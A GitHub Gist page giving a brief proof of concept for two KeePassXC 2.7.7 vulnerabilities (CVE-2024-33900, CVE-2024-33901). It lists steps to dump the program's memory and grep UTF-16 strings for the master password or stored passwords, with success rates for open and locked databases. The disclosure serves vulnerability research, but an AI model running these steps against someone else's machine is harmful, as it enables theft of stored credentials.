Last active
July 3, 2024 13:31
-
-
Save Fastor01/30c6d89c842feb1865ec2cd2d3806838 to your computer and use it in GitHub Desktop.
POC: CVE-2024-33900, CVE-2024-33901
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Get memory dump of KeePassXC (e.g. via Windows Taskmanager or virutalbox debugvm) | |
2a. CVE-2024-33900 - get master password: string -e b <filename> | grep "YOUR MASTER PASSWORD" | |
2b. CVE-2024-33901 - get stored password: string -e b <filename> | grep "YOUR STORED PASSWORD" | |
Note: Both attacks works every time when the database is open in KeePassXC. When the database is closed or locked the probability is 1 in 10 respectively 4 in 10. | |
Why does it work?: Don't really know :P But is the data is somewhere in the memory regions of the qt-framework as UTF-16 string. | |
This affects KeePassXC version 2.7.7. There is a high probablity, that other versions are also affected. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment